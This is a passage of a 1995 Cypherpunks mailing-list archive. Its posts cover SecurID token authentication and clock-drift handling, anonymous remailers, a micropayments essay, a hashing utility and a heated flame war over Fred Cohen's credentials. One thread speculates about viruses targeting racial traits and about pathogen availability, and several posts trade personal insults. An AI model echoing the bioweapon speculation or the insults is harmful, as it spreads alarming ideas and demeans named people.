Bleep! Earth to amp! Check your voltage, lately? The token's serial number has nothing whatsoever to do with the generation of a SecurID's PRN token-code. Just because SDI ships its SecurIDs pre-loaded (most token vendors ask the buyers to program their authentication tokens) SDI embosses a serial number on the back of the token to manage shipping and distribution. The serial number stuck to the back of a SecurID after it is programmed with its secret key -- a unique PRN "significantly longer" than 56 bits -- but they are not the same thing. The cpu in a SecurID doesn't even "know" the serial number stuck on the back of the token. (It would be Pretty Stupid to glue or emboss a secret on the back of the damn token, wouldn't it?) I should note that Alan is just regergitating one of the most widely circulated rumors about SecurIDs -- which like any popular crypto device attracts a lot of wiLd & w00ly speculation. Getting the algorithm for SDI's one-way hash is no big deal, given that it sits in software in thousands of SDI customer installations, protected only by contract and trade secret status. (The integrity of the product -- the unpredictability of the token-code PRN series, and the secrecy of a specific token's seed or key -- rightly depends cryptographic strength of the hash, not the secrecy of the algorithm.) Getting a token-specific secret key would hopefully be a much greater challenge. CG> Can anybody provide me with pointers to more in-depth information CG> about this device and the algorithm(s) behind it ? >i don't know if there are any net sources for them, but i'd be >suprised if not. my card references "security dynamics" of cambridge >massachusetts. Suerte & Happy New Year to all, _Vin <*><*>< Vin McLellan + The Privacy Guild + vin at shore.net ><*><**> Heed, fellow citizens, Justice Felix Frankfurter (Butler v. Michigan): "The State insists that, by thus quarantining the general reading public against books not too rugged for grown men and women in order to shield juvenile innocence, it is exercising its power to promote the general welfare. Surely this is to burn the house to roast the pig.... The incidence of this enactment is to reduce the adult population of Michigan to reading only what is fit for children." From proff at suburbia.net Sun Dec 31 01:44:15 1995 From: proff at suburbia.net (Julian Assange) Date: Sun, 31 Dec 1995 17:44:15 +0800 Subject: (fwd) Benchmarks - revs 1.3.50 & 51 In-Reply-To: <199512310841.DAA09404@thor.cs.umass.edu> Message-ID: <199512310846.TAA07013@suburbia.net> > > And the cypherpunk relevance is.......? > >[...] linux kernel stats Absolutely zero. Your's truely pressed the wrong key. --Proff +----------------------------------+-----------------------------------------+ |Julian Assange | "if you think the United States has | |FAX: +61-3-9819-9066 | has stood still, who built the largest | |EMAIL: proff at suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From EALLENSMITH at ocelot.Rutgers.EDU Sun Dec 31 02:14:03 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Sun, 31 Dec 1995 18:14:03 +0800 Subject: PLA_gue Germ Terrorism Message-ID: <01HZFUC4ZW4W8Y56CR@mbcl.rutgers.edu> From: John Young > 12-30-95. To update the list of terrorist threats, the Wash Post reports on the purchase in May of bubonic plague germs by "white supremacist" Larry Wayne Harris, his bust by the FBI and germ teams, prosecutors amazement that possession of such deadly micro-organisms is not illegal, and the consequent plea bargain of wire fraud with probation. The article explains that possession of "terrorist" mites is not prohibited due to a legal loophole which allows scientific trade in wee supremacists. There are calls for outlawing the meat-eaters by closing the gap in the anti-terrorism bill before Congress. But scientists say how dare you spit in our nanodeath soup. It notes that offshore spread is Commerce regulated. ------------- There are very good reasons for keeping this legal loophole. How could one ship, say, Ebola virus for evaluation if it wasn't there? Besides which, E. Coli (the workhorse of prokaryotic genetics) can be a pathogen if the right plasmid is inserted. Banning shipment, buying, etcetera of strains of it would rapidly reduce most genetics work in the U.S. to the state of gene therapy work in Switzerland (i.e., none, due to the Swiss laws outlawing any form of it). Incidentally, thanks to the person who quashed the "black-seeking virus" idiot. Human races are so far from being proper genetically distinct subspecies that nobody competent would call them that, if they only weren't us. -Allen From futplex at pseudonym.com Sun Dec 31 03:20:07 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 31 Dec 1995 19:20:07 +0800 Subject: anon.penet addresses in .sigs In-Reply-To: Message-ID: <199512311100.GAA18408@thor.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- Subject: Re: anon.penet addresses in .sigs To: cypherpunks at toad.com (Cypherpunks Mailing List) Dr. Dimitri Vulis writes: > This is fascinating! Could you please explain (for the benefit of clueless > Ph.D.'s like myself) how putting your anon id in your signature enables folks > to send you anonymous e-mail, who couldn't do that before by e-mailing > anon at anon.penet.fi and adding: > > X-Anon-To: erc at dal1820.computek.net This issue (the penet address in Ed's .sig) has been covered on the list before. The next time around I think I'll write a short FAQ. The direct address is easier to use, especially for people whose mailers don't allow them to add arbitrary email headers. Note that the ratio of users of the various cypherpunk remailers to users of anon.penet is even lower than the S/N ratio on this list in December. In certain parts of Usenet, many people routinely advertise addresses at anon.penet (and similar services) in their .sigs (as Ed does) to make pseudonymized replies as convenient as possible. This is not a new phenomenon. Happy New Year ! Futplex Brand new key, ID: 0x0F5470D9 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMOZtGynaAKQPVHDZAQGijAf+Ivi2IklP1cJBhDb4/VTm0d0zd/kjJRhh 4BlGShGcQayfKP59jKFBUO/gbqFzjxsdCRuJcL5D7VXOOX4gjjWxqfKM6ora/nGx f3mr+DQO2VhhWrHcXqiURwWBknw37fGWQUMfq8DIVWgiVn5e2EkmTNwzyuY+wRm+ 30xddxfjN2R5eS/DLr9Ebg+VYLvcHQ3kOvbzhHk3ZVI1x21DlT3I/3u5828OB10p s3bpADToW1TbT1o7VrMvKtLla1CYBqJrGpSkPCCm0mG4Qx2UWDuWXr9Ej3m1fWVQ eQI0FFb6Qm+0mzVcQnexTtj+btrqPler5oQBiQmLMuWdohB0cOtRMw== =va+w -----END PGP SIGNATURE----- From fc at all.net Sun Dec 31 10:46:01 1995 From: fc at all.net (Fred Cohen) Date: Mon, 1 Jan 1996 02:46:01 +0800 Subject: Fred Cohen, PhD In-Reply-To: <9512311704.AA03856@anon.penet.fi> Message-ID: <9512311818.AA16259@all.net> > Regarding Fred Cohen, PhD: > > Cohen's haughty and bombastic style do nothing good for his reputation. I > assume he advertises his PhD to highlight his early accomplishments; he has > done little since. Apparently you have a reading disability. I haven't used Ph.D. next to my name on this forum for some time. > Let's also consider the granting institution, a second-rank school. When you insult me, that's one thing, but insulting my school is something quite different. The University of Southern California is one of the finest educational institutions in the world, and is widely recognized as such. The engineering school at USC (from which I earned my Ph.D.) is commonly ranked in the top 10 in the US, and in the year that I graduated, my department was ranked in the top 5 in the US. USC, in addition to having a fine athletic tradition, also has many unique benefits that sets it apart from many other excellent schools. But I wouldn't want to advertise in this forum - you'll have to contact them directly for more extensive information. > Cohen's thesis broke new ground, but how many people have read it, or any of > his writings, or know anything about his ideas beyond a single word? How far > did he carry this work? Where are the conference and journal papers? Cohen's > reputation faded into obscurity long ago. Now he is building a new reputation > as a pig-headed loudmouth, threatening his "defamers." Shades of Sternlight. Some people are ignorant because they haven't had a chance to learn, but other people are ignorant because they choose to be. In your case, it is apparently the latter. But I will answer your questions nonetheless: How many people have read it, or any of his writings, or know anything about his ideas beyond a single word? The thesis has only sold a few hundred copies, however, over 20,000 people have read my books on the subject. My two articles in "The Sciences" reached about 25,000 people each. But I don't think thatr the value of peoples' work is a function of how many people know about them. How far did he carry this work? I have published over 30 refereed journal articles on the subject, about 50 conference papers, about 100 invited talks, and today, over 1/2 of all computers in the world run virus defense software using techniques I first published. That's more refereed papers than anyone else in the world on that particular subject. Where are the conference and journal papers? They are listed on the Web site listed below. They include IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM, DPMA, IFIP, and NIST conferences (as well as many others). So, now that we have a very brief history of my work, let us all know where you went to school, how many journal and conference papers you have published, how many books you have written. We already know that you won't tell people your name because you are afraid to have it associated with you personally, but maybe you can help us all understand how expert you are and what you have contributed to the world so we can appreciate your point of view. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From tcmay at got.net Sun Dec 31 11:25:48 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 1 Jan 1996 03:25:48 +0800 Subject: Can We Cut the Crap? Message-ID: Really, the S/N ratio is approaching all-time lows, even for the Silly Season of Xmas. A week or so ago there was a massive flame war involving insults and counter-insults--I returned from my Xmas vacation to find the list melting down. Now, a week later, a new flamewar has erupted. There is no point in the back-and-forth of insults, "Dr. Fred is a loon," "Alice is Detweiler," and other such nonsense. If you don't want to read the comments of Fred Cohen, Dimitri Vulis, Alice whatever, Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete them immediately, read them briefly, whatever. At 5:04 PM 12/31/95, deadbeat wrote: >Regarding Fred Cohen, PhD: > [typical personal insults elided] >Let's also consider the granting institution, a second-rank school. Well, not quite. I seem to recall that Cohen's advisor at USC was Len Adleman, known perhaps to some of you as the "A" in RSA and more recently as the guy doing the "DNA computing" work. He was also working on viruses, perhaps in conjunction with Cohen, as of 1987-88, and gave an interesting paper at the 1988 Crypto Conference on "An Abstract Theory of Computer Viruses." Not surprisingly, Cohen's papers were the main citations. I recall Adleman describing in the oral talk just how it is that determining if a given program contains a virus is essentially equivalent to solving the halting problem, i.e., it may be undecidable whether a program has a virus, except presumably in some special cases (e.g., for very small programs). >Cohen's thesis broke new ground, but how many people have read it, or any of >his writings, or know anything about his ideas beyond a single word? How far >did he carry this work? Where are the conference and journal papers? Cohen's >reputation faded into obscurity long ago. Now he is building a new reputation >as a pig-headed loudmouth, threatening his "defamers." Shades of Sternlight. I have plenty to disagree with some of what Fred Cohen says, as I do with many people, but this is just plain ignorant. "How many people have read it, or any of his writings..." is a ridiculous argument, even for an ad hominem. Those who want to read it, can read it. The articles are readily available. I've even seen some of his books on the bookshelves of my local bookstores (haven't read them, though I flipped through "It's Alive!" and didn't see much of interest....but how many of us have written _any_ books?). I'm not convinced there's much more about the _theory_ of viruses to "push forward," for various reasons. The theory was laid out, some Bulgarians and others are busily writing viruses, but there's not likely to be some whole reservoir of new theory to be worked on. (This is true of a lot of fields, where the work done decades ago basically was complete....look at how we all cite Garey and Johnson and how little has changed in the field of NP-completeness.) Blasting Cohen because you don't think he carried his work far enough is clearly blasting wildly. Have you asked whether others on this list have carried the work they did in their early careers far enough? (Did I carry my work in the 1970s on alpha particle effects on chips far enough, or am I just a Cohen-like slacker because I moved on to other things?) Anyway, if you don't like Sternlight, or Cohen, or May, or Detweiler, or Metzger, or Vulis, *filter* them out! So why don't I just do this? Well, I do have a filter file in my Eudora Pro mailer, and I use it. But I still see the crossfire on the list, the pointless flames and personal attacks. This angers and saddens me. Hence this message. While I don't subscribe to the extreme view espoused by some, that the topics of the list should be exclusively crypto, math, programming, and Internet standards, I do think people should try to find some relevance to the larger themes of the list. The recent increase in "one-sentance repartee" is indicative of late-stage list meltdown. (Some of the posts here quote a couple of paragraphs, add one or two lines of insults, then have another screenful of PGP sigs, auto-signing sigs, anonymous IDs, and then a conventional sig. Jeesh!) I'm hoping that this is just a Xmas vacation silly season. --Tim May We got computers, we're tapping phone lines, we know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 - 1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From vin at shore.net Sun Dec 31 11:25:59 1995 From: vin at shore.net (Vin McLellan) Date: Mon, 1 Jan 1996 03:25:59 +0800 Subject: SecurIDs (was Re: Australian "calculatorcard") Message-ID: amp described his SecurID: >> sounds like the card i use for remote dialup to certain non-public >> systems i use at work. it has a six digit number on the front that >> changes every 60 seconds. David Lesher asked: >Do these card systems use a window to handle clock-slip? SDI's ACE/Server or ACE access control module (ACM) has a Progress RDBS built in which maintains a constantly-updated historical record of the _relative_ drift in a particular token's clock-chip, relative to the clock in the server or host. When it receives the first identifier from a user (Name) submitting a SecurID authentication call, the server checks the database for the recorded drift and then predicts what that particular token will use as Current Time. CT, together with a token-specific secret key, is then hashed to generate a token-code which is matched with that submitted by the user, together with the user's memorized PIN. >I'd think you could have the server safely accept # N, N-60 sec, and >N+60 seconds; and adjust the server's idea of your card's clock speed >from that. You have it almost exactly right (or, at least, that's how SDI's ACE/SecurID system handles it;-) SDI throws in a couple other factors: the ACE system handles Current Time in 30 or 60-second blocks (depending on the model of SecurID token being authenticated,) so it needs a little leeway to handle a token which, because of drift, slips into the next time-slot or the one behind. The ACE system actually pre-calculates three token-codes -- each a pseudo-random number, so one will not inform your guess of another -- as it waits for a user's incoming authentication call to be completed. The server will approve access if it receives a token code generated from either its _projected_ Current Time (for this particular token,) or the token-codes generated from Current Time plus or minus one time-slot. When the ACE database indicates that this particular SecurID token has not been used in the past 60 days (many sysadmin make this 90 days) it also kicks in a search mode to minimize the false rejections. In search mode it calculates a series of prospective card-codes, sweeping out to a maximum of 10 time-slots (the actual scope of the search is defined by the sysadmin) fore and aft of whatever the database suggests this token should consider Current Time. If it finds a match between the token-code submitted from a long-unused SecurID and one of those calculated by the server in search mode, it updates its database projection for the drift of that particular token and then requests the use to submit another PRN token-code. A search-mode "match" alone will never result in a user being authenticated -- it only sets him or her up for a second formal authentication cycle where a new PRN card-code is matched against a new set of three token-codes. There are also a number of additional security devices and rules which the server enforces to protect against security threats, racing spoofs, stolen PINs, stolen tokens, etc. The most obvious is a secured record of all incoming authentication calls, recorded by token-code and GMT time. All incoming authentication calls are checked against this file. A SecurID PRN token-code is never accepted twice, and the virtual "time-stamp" within an incoming SecurID token-code must always be later and in proper sequence to all other recorded authentication calls. > >What new risk would that create? If the SDI hash algorithm is of sufficient strength, very little, I would think. (SDI just asked me to create an FAQ for their SecurID, so all queries are welcome -- on-line or off.) Suerte, _Vin Vin McLellan +The Privacy Guild+ 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548 <*><*><*><*><*><*><*><*><*> From jonnyx at edge.edge.net Sun Dec 31 12:40:18 1995 From: jonnyx at edge.edge.net (jonnyx) Date: Mon, 1 Jan 1996 04:40:18 +0800 Subject: (NOISE - LONG) Re: PLA_gue Germ Terrorism Message-ID: <199512312003.OAA20537@edge.edge.net> Crypto relevance: absolutely none! Good lord, what nasty reactions! Maybe there's hope for us after all. I'll allow myself one reply. Sorry 'bout the length. < snip re: my bits on targetting specific genetic traits > zinc wrote: > this is so much shit. targetting anything is very difficult. > just ask all those people about the wonders of gene therapy. > hell, even the economist had an article about it's failures > recently (Dec 16-22 1995, p77). Putting a person on the moon was considered impossible by most folks 50 years ago. The German v-series rockets were cutting edge technology. Now licensed hobbyists can buy solid fuel motors that are just as powerful some of the ones the Nazis had (source: _High Power Rocketry_). Things change. > in any event the so-called 'differences' you are imagining > are phenotypes. these are a long cry from DNA. i'm not > aware of any genetic markers available to distinguish a > black man from a white man. and, even if there were, > recombination requires long stretches of homology between > DNAs, not small differences. i'd bet it's nearly impossible > to target black vs white vs yellow vs a gorilla. Good. The article I read that suggested the possibility (I'm pretty sure it was in _Science_ or _Scientific American_) was rather spooky. I wish you'd said FLATLY impossible, though. I'm (obviosly) not a biologist/geneticist/whatever, but aren't there bugs that go after only chimps? And didn't that ebola strain in Virginia only go after the lab monkeys, not the people? ...and from Jim Choate: > Malarky. < snip > > Most of the threat of this type of experiments are from simple > infections since viruses are not easily raised with this form > of equipment. People will have access to more and better equipment, though. > One of my favorite 'technology rulers' is when the first strain > of commen yeast is released which produces THC or LSD. Heh. Guess they'll have to post extra guards at the Wonder Bread plant, eh? Woudn't want terrorists dosing little Jimmy's lunch. < interesting stuff snipped > > I do not believe we will see this in the near term using the > micro-manipulater systems which do direct injection of genetic > material because of the cost and utility requirements of such > equipment. Which will probably become simplified, streamlined, and cheaper. Who knows what techniques will be used 20-50 years from now? Even though (fortunately) it seems that this kind of virus would be much tougher to produce than I thought (if not impossible), I can still see someone trying it and infecting EVERYONE in his neighborhood/city/state. And if it is possible, well, I'd rather have the idea explored and cures developed (with the info available to all) before any would-be Hitler surprised us. Finally, from E. ALLEN SMITH > E. Coli (the workhorse of prokaryotic genetics) can be a pathogen > if the right plasmid is inserted. > Incidentally, thanks to the person who quashed the > "black-seeking virus" idiot. Not my idea (I'm not that twisted; I find the idea horrifying). I read the suggestion in either _Science_ or _Scientific American_ (early 1993?). Incidently, the idea was a virus that went after people with specific racial traits, not a "black-seeking virus". Don't attribute me with quotes that aren't mine. I have enough problems with idiots who assume I'm a racist KKK country-music loving redneck simply because I'm from Nashville. > Human races are so far from being proper genetically distinct > subspecies that nobody competent would call them that, Guess what sunshine, they still teach this in mid- and high-schools. Hell, even my dictionary sez "race - 1) a division of the human population distinguished by physical characteristics transmitted by genes." (Webster's II New Riverside Dictionary, if anyone cares) > if they only weren't us. Huh? Now back to our regularly scheduled crypto (yeah, right). -- || ______ || comments, criticisms, and/or death-threats may be sent to: || || \__ /\ || jonny anonymous, c/o jonnyx at edge.net || || __/ / \ || or snail-mail pobox 23001, nashvegas tn 37202-3001, usa || || \__/_/\_\ ||______"DRIVING DRUNK ON THE INFORMATION SUPERHIGHWAY!"______|| From Basspunx at aol.com Sun Dec 31 12:48:01 1995 From: Basspunx at aol.com (Basspunx at aol.com) Date: Mon, 1 Jan 1996 04:48:01 +0800 Subject: put me on the list Message-ID: <951231150900_103045223@emout05.mail.aol.com> i would like to be put on the cypherpunks mailing list From cjs at netcom.com Sun Dec 31 12:55:25 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Mon, 1 Jan 1996 04:55:25 +0800 Subject: Fred Cohen, PhD In-Reply-To: <9512311818.AA16259@all.net> Message-ID: <199512311909.OAA00177@localhost.cjs.net> > > Regarding Fred Cohen, PhD: > > > > Cohen's haughty and bombastic style do nothing good for his reputation. I > > assume he advertises his PhD to highlight his early accomplishments; he has > > done little since. > > Apparently you have a reading disability. I haven't used Ph.D. next to my > name on this forum for some time. .oO( some time = ~3 weeks ) > > Let's also consider the granting institution, a second-rank school. > > When you insult me, that's one thing, but insulting my school is > something quite different. The University of Southern California is one > of the finest educational institutions in the world, and is widely > recognized as such. .oO( So is Alabama State, even says so in the catalog ) > The engineering school at USC (from which I earned > my Ph.D.) is commonly ranked in the top 10 in the US, and in the year > that I graduated, my department was ranked in the top 5 in the US. > > USC, in addition to having a fine athletic tradition, also has many > unique benefits that sets it apart from many other excellent schools. > But I wouldn't want to advertise in this forum - you'll have to contact > them directly for more extensive information. .oO( I see you still have their catalog ) > > Cohen's thesis broke new ground, but how many people have read it, or any of > > his writings, or know anything about his ideas beyond a single word? How far > > did he carry this work? Where are the conference and journal papers? Cohen's > > reputation faded into obscurity long ago. Now he is building a new reputation > > as a pig-headed loudmouth, threatening his "defamers." Shades of Sternlight. > > Some people are ignorant because they haven't had a chance to learn, but > other people are ignorant because they choose to be. In your case, it is .oO( Some people just don't have two clues to rub together ) > apparently the latter. But I will answer your questions nonetheless: > > How many people have read it, or any of his writings, or know anything > about his ideas beyond a single word? > > The thesis has only sold a few hundred copies, however, over > 20,000 people have read my books on the subject. My two > articles in "The Sciences" reached about 25,000 people each. ( I once told an OJ Simpson joke on Usenet ) ( that was supposedly seen by 40 million people ) .OO( including a dozen messaiahs, three space men, ) ( and a hermathadite. ) > But I don't think thatr the value of peoples' work is a > function of how many people know about them. > > How far did he carry this work? > > I have published over 30 refereed journal articles on the subject, > about 50 conference papers, about 100 invited talks, and today, > over 1/2 of all computers in the world run virus defense software > using techniques I first published. That's more refereed papers > than anyone else in the world on that particular subject. ( Also gives Jerry Pournell something to talk about besides ) .oO( Wing Commander, hope you add that to your resume ) > Where are the conference and journal papers? > > They are listed on the Web site listed below. They include > IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM, > DPMA, IFIP, and NIST conferences (as well as many others). ( What? No WiReD magazine? How did he escape the crackpot ) .oO( visionary center of the universe? ) > So, now that we have a very brief history of my work, let us all know > where you went to school, how many journal and conference papers you > have published, how many books you have written. > > We already know that you won't tell people your name because you are > afraid to have it associated with you personally, but maybe you can help ( Dr. Fred hides behind a post office box to people can't ) .oO( drop by and tell him hes a loon ) > us all understand how expert you are and what you have contributed to > the world so we can appreciate your point of view. .oO( I ain't no Ph.D, but even I can see Fred is a loon ) > -> See: Info-Sec Heaven at URL http://all.net/ ( Someone told him he was missing the /, was fun while it lasted ) .oO( Wonder if he will write a paper on URL grammar now ) > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rah at shipwright.com Sun Dec 31 13:11:34 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 1 Jan 1996 05:11:34 +0800 Subject: (fwd) e$: Looking down, not up, to the future Message-ID: --- begin forwarded text Sender: e$@thumper.vmeng.com Reply-To: rah at shipwright.com (Robert Hettinga) Mime-Version: 1.0 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 29 Dec 1995 15:07:53 -0500 Precedence: Bulk To: Multiple recipients of Subject: e$: Looking down, not up, to the future -----BEGIN PGP SIGNED MESSAGE----- e$: Looking down, not up, to the future 12/29/95 First a little administrivia. Going forward, I'm going to be posting my rants here first at e$@thumper.vmeng.com, with a forward from e$ of the given rant, after some arbitrary delay, to any other lists that might be appropriate to the subject. My sponsors have paid for this list, and the readership of the e$pam and e$ are there to hear what I and others have to say about e$ and its consequences here, and so my stuff goes onto the e$ list first from now on. Like all my writing on the net, redistribution with attribution to me and the other people I cite (When remember to cite them all...) here is just fine. If you're publishing it, and you pay your authors, I'd like to be compensated too, of course. Not that what I say here is going to be all that earthshaking, but I thought I'd clear the air a bit. I've read a lot of interesting things about the future of the net in the last few weeks, some of which I've sent on to e$pam, and I'd like to talk about them, by way of clearing the decks for the New Year. First, I'd like to go revise my model of net.reality a bit. Most of people look at the net as a hierarchy. Architecturally, it is exactly that, from the IP addressing scheme, to the object super-hierarchies in component software models, to server-mirroring, to just about any kind of structural component of the net you would care to look at. Physically, big lines get broken up by big switches into smaller lines which get broken up by smaller switches into smaller lines, in a fractal process which ends up at you or me, where it goes back up each larger level to get where it needs to go. In software, the CORBA object model, and the super-object-model that the research people have been cooking up at Microsoft, all have a "root" somewhere; the "top" of their taxonomical system, if you will. In information, there's a source of the information, and it gets accreted with other information and synthesized and averaged and summarized and rolled up into some larger aggregate which allows you to have some knowlege about that information and other information like it. In finance, my money gets pooled with other people's money through several larger aggregation layers and then invested or spent centrally somewhere. The recipient of capital or cashflow then spends or invests it in fractally smaller chunks until I get it in a check for something I do. I could go on and on with this, but you can see my point, and it is the same point Rich Lethin loves to use on *me* when I start talking about "geodesic" anything, that is, the idea that Moore's law exponentially collapses switching costs, making nodes cheaper than lines, making the network and the software processes mapped onto it more geodesic instead of hierarchical, and "surfacting" information and software into fractally smaller and smaller pieces. What I've been saying to Rich, particularly when I talk about geodesic networks, is that the message itself is point-to-point, even though the actual electrons may flow more or less hierarchically around the network. That's kept him busy while I made my getaway. It always felt like a sophistic shuck, myself, but I'd learned to live with it until now. I don't know if I've gotten anywhere, but I've been thinking about it a bit, thrashing anologies from other parts of the world, --the major way I think, unfortunately -- to describe what I see out there. I've been thinking about biological models, because in my stranger moments, I like pretend that the net is an electro-biological entity. For instance, the circulation of blood is a good anology, I think, because all the endocrine messages in the blood stream are ultimately broadcast from a single cell and paradoxically sent point to point to another cell -- just like things are on an ethernet wire, or on Gilder's fanciful dark fiber, even though the circulatory "backbone" is hierarchical. The most obvious example of course is the organization of neurons, in that the brain pathways are essentially geodesic, but we still have to deal with the hierarchy of nerves outside of the brain. The one thing I think that differentiates these models from the hierarchies we encounter in social life, the industrial induced control hierarchies we all rail against, and the stuff I like to quixotically do battle with on the net, is that every one of those biological hierarchies is chaotic. There is no pretense of top-down control of the system. The load of the system is hierarchical, and so the system organizes itself hierarchically. There are physical forces which create physically hierarchical stuctures, but they're usually set up to solve the problem of efficient distribution of something over a distance, like draining a watershed, or getting blood to a central heart and lungs, or nerve impulses back and forth to the brain. When distance isn't a problem, networks, like the brain, tend to get more geodesic. Bandwidth is maintained by an abundance of neuronic "switches", doubling as processors, tripling as memory, each with some number of connections to other neurons, rather than a bunch of "fat" nurons doing all the signal processing. As an exception which proves the rule, note there *are* in fact "fat" neurons, more precisely redundant neuron pathways, particularly between the two halves of the brain, and between the brain and the rest of the body. So, what else is new? We still have hierarchies on the net, right? We're about to bump up by many orders of magnitude the number of possible IP addresses real soon, so that someday your toaster can tell your alarm clock to wake you for breakfast. I've ranted, tounge-in-cheek, about the "dangers" of the "X.blabla" book-entry view of the world, with hierarchical, government-as-root certification "authorities", and the consequences of having an audit trail on your every net-based financial activity. Most of this X.blabla stuff will come to pass, mostly because it's the easiest thing for the financial system as it's currently organized to do. It's sort of like financial "shovelware", moving the contents of one financial medium, the hierarchic industrial paradigm of government regulated central banking systems onto the new medium of the internet. However, in a world of micro-pay-as-you-go packet routing, where routers may someday spot-auction their bandwidth on a demand basis at packet prices displayed best in scientific notation, all those audit threads could lead to a Gulliverian restraint on personal freedom, much less on individual privacy. Fortunately, I don't think that's going to happen, because those same Lilliputian audit trails will just get in the way and slow the system to a standstill. We need to get more chaotic. I think my contention on this is that as we get smaller and smaller, the more chaotic it's going to have to be. Book-entry based transaction processing systems will choke on their own accounting at those levels. To look at the extremely-hypothetical router above, it will be easier to attach some digital bearer microcertificates to an information packet, so that the packet pays its way through all the routers it needs to go to, than it will be for some giant book entry system to account for it all. People have said that those microcertificates could work like stamps, where the first router cancels the stamp and pays back the other routers in the route some fraction of the "stamp" price to be settled later, or it may be possible to simply endow a packet with all the certificates nessary to get from point to point in a network someday. It kind of reminds me digital cash-as-processor-food, a bit. Note that this kind of bio-economic thinking is not new, the Agorics folks and Stewart Brand have been talking about this stuff for quite a while. My point here is that "down" the network, not up, is the place to look for the interesting stuff in the future. There are several interesting micropayment certificate systems out there, and there will be more. As software gets smaller and smaller with component architectures like OpenDoc and its eventual successors, it will be more and more economic to charge rediculously smaller and smaller amounts for rediculously smaller and smaller network behaviors. Just wait until someone figures how to get software to really "evolve", or gets software to write other software on a practical basis. Most of the people I read, on the net or off, don't see this. They're looking "up" the net, how connections are made up, at the level of the grosser network features, like how monolithic corporations, or book-entry database and financial control systems, or government regulations, will happen on the net. How the net will integrate itself with the "real" world they're familiar with. 8 years ago, I used to talk about people who lived "on" microcomputers versus the ones who lived "in" them. I used to say that Macs were more for people who lived "in" computers because they weren't hindered by the mechanics of the interface so much. I think that there are still a lot of mainframe-cum-client/server folks out there who still live "on" the net, and not in it. Those are the people who are looking "up" at how the "big" players will behave, when they should be look at their feet, where the real action is. Where the very ground is in the process of dissoving out from under them. Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMORJaPgyLN8bw6ZVAQG+WQP/X4j2qn9tnhDoJKdqctxBCoQzH4F//kKc zsau7Cxs49XGHAaoZo2Pk2svU79FWG7HyWsm0VAPR9ezHiWf8W/Tyi1NgxCkNwjo 62HFNsE0U6Rfo0Itd26WuICe9aC2SG5J6tX8+MzJZqHzzx2xhBUNPKFqt/ZwVtFZ KNLAGkM/7Hg= =jc3o -----END PGP SIGNATURE----- -------------------------------------------------- The e$ lists are brought to you by: Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html Where people, networks and money come together: Consult Hyperion http://www.hyperion.co.uk info at hyperion.co.uk See your name here! Be a charter sponsor for e$pam, e$, and Ne$ws! e-mail rah at shipwright.com for details... ------------------------------------------------- --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jsimmons at goblin.punk.net Sun Dec 31 13:30:47 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Mon, 1 Jan 1996 05:30:47 +0800 Subject: The F.C. flamewar Message-ID: <199512312115.NAA07063@goblin.punk.net> You know, if I worked for an organization that was dedicated to restricting strong crypto, eliminating people's privacy rights, monitoring and recording everything that people say or write, etc. etc. ad infinitum, I'd probably spend at least a part of every day sitting in front of my computer in my little cubicle somewhere in Virginia, making posts to cypherpunks just like these ... -- Jeff Simmons jsimmons at goblin.punk.net From wlkngowl at unix.asb.com Sun Dec 31 14:06:49 1995 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Mon, 1 Jan 1996 06:06:49 +0800 Subject: SHATEST (was: Re: DOS - MD5 - Thanks) Message-ID: <199512312155.QAA03270@UNiX.asb.com> On Fri, 29 Dec 1995 15:22:46 -0700 (MST), you wrote: I've got a little goodie called SHATEST which I'm going to include with the next release of the NOISE.SYS driver.. it's the Secure Hash equivalent of MD5SUM... (Originally written to test the optimized SHA code-- much thanks to Colin Plumb, BTW--- for the /dev/random driver...) --Rob >A freestanding implementation of MD5SUM (compiled from that in the PGP >distribution) for DOS is at >ftp://ftp.csn.net/mpj/public/md5sum.zip and on the Colorado Catacombs BBS >at 303-772-1062. >I suggested to Phil Zimmermann that he should put this in the next PGP >release along with the compiled DOS version of PGP, but there hasn't been >a new release of PGP since then. >Happy New Year! Ditto... >Mike Johnson >mpj at exabyte.com >#include From raph at c2.org Sun Dec 31 14:14:45 1995 From: raph at c2.org (Raph Levien) Date: Mon, 1 Jan 1996 06:14:45 +0800 Subject: A great time to be a cypherpunk Message-ID: <199512312146.NAA22286@infinity.c2.org> Amidst all the silliness, flames, and lunacy of this list, there's a tremendous amount of exciting stuff going on. I thought I'd take the opportunity to do one of those self-indulgent look back at the year postings. Cypherpunks write code. One of the best things about 1995 was the volume and quality of cpunk code that was released, and, perhaps equally importantly, existing cpunk programs that continue to be supported and improved. Here's a subjective top 5 list: 1. SSLeay, by Eric Young and Tim Hudson. Ordinarily, I wouldn't consider a crypto library to be all that newsworthy, but SSLeay is clearly an exception. SSLeay's real strength is its ability to be integrated easily into real applications, including Apache/SSL, Mosaic, telnet, etc. I'll go out on a 